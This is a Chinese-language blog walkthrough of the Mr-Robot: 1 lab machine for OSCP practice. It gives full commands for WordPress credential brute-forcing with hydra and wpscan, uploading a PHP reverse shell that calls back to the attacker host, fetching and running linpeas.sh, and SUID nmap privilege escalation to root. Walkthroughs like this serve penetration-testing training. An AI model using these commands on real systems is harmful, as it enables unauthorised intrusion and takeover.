freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

红队渗透项目之Mr-Robot: 1

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

红队渗透项目之Mr-Robot: 1
十七Seven 2023-04-20 18:07:02 275541
所属地 江西省

简介

该项目是Leon Johnson作者精心制作的项目,目标是获取获得root权限并找到flag.txt文本信息,该项目作为OSCP考试培训必打的一个项目环境,该作者评定该环境为渗透中级水准难度。接下来不管是零基础学习渗透者,还是有些基础的渗透者,甚至是高水平的渗透人员读该的技巧和文章都能学习到一些红队知识。

该项目有始有终会用到 信息收集 -> WEB信息枚举 -> 暴力破解 -> wpscan枚举 -> worepress站getshell -> 内网信息收集 -> 提权 ,最终拿到flag.txt的过程,那么在八大模块中用到了一些小技巧都会在文章中演示出来,希望大家能动手也来和我一起学习渗透。

请注意:

本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。

一、信息收集

信息收集非常重要,有了信息才能知道下一步该如何进行,接下来将用nmap来演示信息收集:

1、nmap扫描存活IP

由于本项目环境是nat模式需要项目IP地址,扫描挖掘本地的IP地址信息:

202209141345796.png

本机IP为:192.168.40.177。

发现本kali ip为40段!用40段进行全网段扫描:

nmap -sP 192.168.40.0/24

202209141345797.png

Nmap scan report for localhost (192.168.40.191)

发现项目IP地址:192.168.40.191。

2、nmap全端口服务枚举

进行namp端口服务枚举:

nmap -p- 192.168.40.191

202209141345798.png

得到开放的端口信息:

22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https

只开启了页面端口,接下来进行web页面枚举!

二、web信息枚举

1、web页面枚举

访问80端口,并查看源码:

http://192.168.40.191/

202209141345799.png

发现是个js页面,没有什么可用的信息!

2、dirb爆破目录

利用dirb爆破目录信息枚举:

dirb http://192.168.40.191/

202209141345800.png

发现多级目录,大致访问下发现如下信息;

wordpress博客登录界面:

http://192.168.40.191/wp-login.php

202209141345801.png

需要查找登录账户密码

枚举出存在robots.txt:

http://192.168.40.191/admin/robots.txt

202209141345802.png

发现fsocity.dic和key-1-of-3.txt

http://192.168.40.191/robots.txt

202209141345803.png

3、获得flag1

wget http://192.168.40.191/key-1-of-3.txt 
ls
cat key-1-of-3.txt

202209141345804.png

下载fsocity.dic

wget http://192.168.40.191/fsocity.dic
ls

202209141345805.png

发现这就是个字典,改为txt文件方便后面利用:

mv fsocity.dic user.txt

202209141345806.png

三、暴力破解

1、BP抓包分析

利用BP抓包分析:

http://10.211.55.49/wp-login.php

202209141345807.png

发现boby:

log=1&pwd=1&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.40.191%2Fwp-admin%2F&testcookie=1

2、hydra爆破

运用hydra爆破字典,获取登录账户:

hydra -L user.txt -p test 192.168.40.191 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
-L 用户名,运用字典user.txt
-p  单个密码,任拟
192.168.40.191 目标IP
http-post-form 表示破解是采用http的post方式提交的表单密码破解
F=  内容是表示错误猜解的返回信息提示

202209141345808.png

成功爆破出用户名:Elliot

[80][http-post-form] host: 192.168.40.191   login: ELLIOT   password: test

四、wpscan枚举Elliot

1、wpscan爆破密码

wpscan -U Elliot -P user.txt --url http://192.168.40.191 -t 10000

202209141345809.png

爆破需要一段时间,所以加入-t一万个线层进行爆破!

但是经过40分钟才可以爆破出来!

检查字典发现很多重复的,Linux sort 命令用于将文本文件内容加以排序:sort 可针对文本文件的内容,以行为单位来排序。https://www.runoob.com/linux/linux-comm-sort.html

2、sort去重

利用sort对字典进行去重:

sort user.txt | uniq > user1.txt
-u, --unique 配合-c,严格校验排序;不配合-c,则只输出一次排序结果

202209141345810.png

202209141345811.png

去重后的字典缩小至9KB!

继续用wpscan爆破密码:

wpscan -U Elliot -P user1.txt --url http://192.168.40.191

202209141345812.png

202209141345813.png

获得密码:

[SUCCESS] - Elliot / ER28-0652

通过不到一分钟就成功爆破了!

五、worepress站getshell

1、worepress页面信息枚举

worepress页面登录并查找上传模块:

http://192.168.40.191 /wp-login.php 
elliot
ER28-0652

202209141345814.png

202209141345815.png

成功登录!

发现上传入口

点击:Appearance->Add New->Upload Theme->文件上传

202209141345816.png

2、漏洞利用

下载并配置PHP漏洞参数:

locate php-reverse-shell.php
cp /usr/share/webshells/php/php-reverse-shell.php .
gedit php-reverse-shell.php

202209141345817.png

配置IP为本地kali地址,端口可不变

192.168.40.177
1234

202209141345818.png

3、漏洞上传

在文件上传处上传php-reverse-shell

202209141345819.png

然后点击模块:Media

点击刚上传的漏洞文件!

202209141345820.png

右边获得上传点链接:

http://192.168.40.191/wp-content/uploads/2022/07/php-reverse-shell.php

202209141345821.png

开启nc接收shell

nc -vlp 1234

202209141345822.png

访问漏洞链接,获得反弹shell

http://192.168.40.191/wp-content/uploads/2022/07/php-reverse-shell.php

202209141345823.png

成功获得反弹shell,但是这里获得的是/bin/sh的shell在执行

202209141345824.png

发现是sh shell,sh不能走python shell

which python 
/bin/bash
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + z
stty raw -echo
fg

202209141345825.png

获得稳定的反弹shell!

六、内部信息收集

1、信息收集

进入robot,发现flag2和密匙:

cd /home/robot
ls
cat password.raw-md5

202209141345826.png

获得以下信息:

flag需robot权限
robot密匙:c3fcd3d76192e4007dfb496cca67e13b

查看密码类型

hash-identifier

202209141345827.png

发现是MD5密码

2、获得robot密码

在线解密:

https://www.somd5.com/

202209141345828.png

获得密码:

abcdefghijklmnopqrstuvwxyz

七、提权

1、flag2

su进入获得flag2:

su robot
abcdefghijklmnopqrstuvwxyz

202209141345829.png

获得flag2:

ls
cat key-2-of-3.txt

202209141345831.png

flag2:822c73956184f694993bede3eb39f959

2、信息枚举

上传扫描脚本linpeas.sh

python -m SimpleHTTPServer 8081
cd /tmp
wget http://192.168.40.177:8081/linpeas.sh

202209141345832.png

赋权并执行脚本:

chmod +x linpeas.sh
./linpeas.sh

202209141345833.png

内核版本:

Linux version 3.13.0-55-generic 
Sudo version 1.8.9p5

202209141345834.png

计划任务:

08 * * * * bitnami cd /opt/bitnami/stats && ./agent.bin --run -D

202209141345835.png

nmap权限

-rwsr-xr-x 1 root root 493K Nov 13  2015 /usr/local/bin/nmap

202209141345836.png

测试后内核漏洞37292.c,利用不了;计划任务 是个bin文件,提权不了

尝试nmap利用!

3、nmap提权

查看下有无安装nmap:

find / -perm -4000 2>/dev/null

202209141345837.png

安装了nmap

利用priv升级漏洞进行bash提权

nmap --interactive
或/usr/local/bin/nmap --interactive   ---即可得到交互式shell
!whoami
!/bin/bash -p

202209141345838.png

成功获得root权限!

获得flag3:

cd /root
ls
cat key-3-of-3.txt

202209141345839.png

flag3:04787ddef27c3dee1ee161b21670b4e4

# 渗透测试 # web安全 # 系统安全 # 漏洞分析 # 网络安全技术
本文为 十七Seven 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
JAVA代码审计-天喵商城 原创
JAVA代码审计-天喵商城

Web安全

此篇文章主要记录了组件漏洞、第三方组件、web漏洞的分析和复现,便于进一步学习代码审计的知识。

pony686

375171围观  · 5收藏  · 41喜欢 2023-04-23

RSAC创新沙盒十强出炉,这家SCA公司火了
RSAC创新沙盒十强出炉,这家SCA公司火了

Web安全

引言近日,全球网络安全行业创新风向标RSAC创新沙盒公布了本年度入围十强的名单。

云鲨RASP

126581围观 2023-04-23

【漏洞复现】MinIO敏感信息泄露(CVE-2023-28432)
【漏洞复现】MinIO敏感信息泄露(CVE-2023-28432)

Web安全

MinIO发现信息泄露漏洞

十九线菜鸟学安全

403862围观 2023-04-23

【漏洞复现】利用禅道系统RCE命令执行漏洞反弹shell
【漏洞复现】利用禅道系统RCE命令执行漏洞反弹shell

漏洞

禅道命令执行漏洞复现

十九线菜鸟学安全

371884围观  · 2收藏  · 3喜欢 2023-04-23

从CommonsCollections中各Transformer的了解到Proof of Concept的编写教程全过程 原创
从CommonsCollections中各Transformer的了解到Proof of Concept的编写教程全过程

Web安全

初学者,欢迎各位大佬指正

superLeeH

342039围观 2023-04-22

十七Seven LV.4
这家伙太懒了,还未填写个人描述!
  • 15 文章数
  • 72 关注者
红队渗透项目之zico2-1
2023-11-13
红队渗透项目之Node-1
2023-05-05
红队渗透项目之MinU: 1
2023-01-13
文章目录
1、nmap扫描存活IP
    2、nmap全端口服务枚举
      1、web页面枚举
        2、dirb爆破目录
          3、获得flag1
            1、BP抓包分析
              2、hydra爆破
                1、wpscan爆破密码
                  2、sort去重
                    1、worepress页面信息枚举
                      2、漏洞利用
                        3、漏洞上传
                          1、信息收集
                            2、获得robot密码
                              1、flag2
                                2、信息枚举
                                  3、nmap提权